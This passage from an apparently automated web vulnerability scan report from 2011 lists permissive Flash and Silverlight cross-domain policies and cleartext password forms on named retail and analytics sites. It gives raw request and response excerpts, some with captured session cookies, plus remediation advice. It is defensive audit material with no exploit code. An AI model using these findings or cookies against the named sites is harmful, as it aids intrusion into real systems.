   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.79. http://www.ftd.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=4859AF2A7F5F107F0010D25B2EEAFAE4; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=4859AF2A7F5F107F0010D25B2EEAFAE4; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 01:53:23 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
ETag: "fb-4da5239d"
Content-Type: text/xml
Content-Length: 251
Date: Mon, 16 May 2011 01:53:23 GMT
X-Varnish: 747078534
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...

6.80. http://www.gnc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:16 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 405
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:16 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-access-from domain="gnc.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.81. https://www.gnc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.gnc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:13 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 405
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:14:13 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-access-from domain="gnc.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.82. http://www.homedepot.ca/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.homedepot.ca
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 31 Jan 2011 07:35:36 GMT
Content-Type: text/xml
Date: Mon, 16 May 2011 01:53:26 GMT
Content-Length: 339
Connection: close
Cache-Control: max-age=315360000
Expires: Mon, 10 May 2021 10:46:15 GMT

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.homedepot.ca" /> <allow-access-from domain="*.startaconversation.com" />
<allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.83. http://www.petsmart.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.petsmart.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:01 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
Accept-Ranges: bytes
Content-Length: 781
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:53:01 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secu
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="pet.imageg.net" />
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.84. https://www.petsmart.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:17:47 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
Accept-Ranges: bytes
Content-Length: 781
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:17:47 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secu
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="pet.imageg.net" />
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.85. http://www.res-x.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 217
Content-Type: text/xml
Last-Modified: Fri, 22 Jan 2010 01:35:21 GMT
Accept-Ranges: bytes
ETag: "fe71562939bca1:bde"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.warnerbros.com"/>
</cross
...[SNIP]...

6.86. http://www.helzberg.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.helzberg.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:32 GMT
ETag: "1fa-9159e300"
Accept-Ranges: bytes
Content-Length: 506
Content-Type: application/xml
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 01:53:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="testvip1.scene7.com" />
<allow-access-from domain="s7ondemand1.scene7.com" />
<allow-access-from domain="testvipd2.scene7.com" />
<allow-access-from domain="s7d2.scene7.com" />
<allow-access-from domain="origin-apps3.scene7.com" />
<allow-access-from domain="s7demo.scene7.com" />
...[SNIP]...

6.87. https://www.helzberg.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.helzberg.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:32 GMT
ETag: "1fa-9159e300"
Content-Type: application/xml
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 10:45:12 GMT
Content-Length: 506
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="testvip1.scene7.com" />
<allow-access-from domain="s7ondemand1.scene7.com" />
<allow-access-from domain="testvipd2.scene7.com" />
<allow-access-from domain="s7d2.scene7.com" />
<allow-access-from domain="origin-apps3.scene7.com" />
<allow-access-from domain="s7demo.scene7.com" />
...[SNIP]...

7. Silverlight cross-domain policy previous next
There are 15 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://cebwa.122.2o7.net/clientaccesspolicy.xml
http://gsicace.112.2o7.net/clientaccesspolicy.xml
http://marketlive.122.2o7.net/clientaccesspolicy.xml
http://metrics.brookstone.com/clientaccesspolicy.xml
http://metrics.ftd.com/clientaccesspolicy.xml
http://metrics.gnc.com/clientaccesspolicy.xml
http://metrics.mcafee.com/clientaccesspolicy.xml
http://metrics.pacsun.com/clientaccesspolicy.xml
http://metrics.petsmart.com/clientaccesspolicy.xml
http://mlarmani.122.2o7.net/clientaccesspolicy.xml
http://o.toshibadirect.com/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://wasc.homedepot.ca/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 16 May 2011 01:53:56 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 01:55:23 GMT
Date: Mon, 16 May 2011 01:55:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://cebwa.122.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cebwa.122.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cebwa.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:08 GMT
Server: Omniture DC/2.0.0
xserver: www80
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.4. http://gsicace.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gsicace.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: gsicace.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:12 GMT
Server: Omniture DC/2.0.0
xserver: www388
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://marketlive.122.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://marketlive.122.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: marketlive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:42 GMT
Server: Omniture DC/2.0.0
xserver: www438
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.6. http://metrics.brookstone.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.brookstone.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.brookstone.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:56 GMT
Server: Omniture DC/2.0.0
xserver: www321
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.7. http://metrics.ftd.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.ftd.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:38 GMT
Server: Omniture DC/2.0.0
xserver: www268
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.8. http://metrics.gnc.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.gnc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:44 GMT
Server: Omniture DC/2.0.0
xserver: www344
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.9. http://metrics.mcafee.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.mcafee.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:39 GMT
Server: Omniture DC/2.0.0
xserver: www76
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://metrics.pacsun.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.pacsun.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.pacsun.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
xserver: www30
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.11. http://metrics.petsmart.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.petsmart.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:15 GMT
Server: Omniture DC/2.0.0
xserver: www637
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.12. http://mlarmani.122.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mlarmani.122.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mlarmani.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:02 GMT
Server: Omniture DC/2.0.0
xserver: www9
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.13. http://o.toshibadirect.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://o.toshibadirect.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Omniture DC/2.0.0
xserver: www285
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 02:00:14 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.15. http://wasc.homedepot.ca/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wasc.homedepot.ca
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wasc.homedepot.ca

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
xserver: www15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8. Cleartext submission of password previous next
There are 5 instances of this issue:

http://shoprunner.force.com/content/JsContentElementsGNC
http://shoprunner.force.com/content/JsContentElementsPET
http://www.ftd.com/
http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/
http://www.petco.com/Secure/Login.aspx

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

8.1. http://shoprunner.force.com/content/JsContentElementsGNC previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://shoprunner.force.com/content/step1

The form contains the following password field:

password2

Request

GET /content/JsContentElementsGNC HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:43 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:18 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=8008
Expires: Mon, 16 May 2011 12:29:56 GMT
Date: Mon, 16 May 2011 10:16:28 GMT
Connection: close
Content-Length: 108383

function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

8.2. http://shoprunner.force.com/content/JsContentElementsPET previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://shoprunner.force.com/content/step1

The form contains the following password field:

password2

Request

GET /content/JsContentElementsPET HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:40 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:45 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=7868
Expires: Mon, 16 May 2011 12:29:04 GMT
Date: Mon, 16 May 2011 10:17:56 GMT
Connection: close
Content-Length: 106125

function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

8.3. http://www.ftd.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ftd.com/

The form contains the following password fields:

password
password_ver

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

8.4. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

The form contains the following password fields:

password
password_ver

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
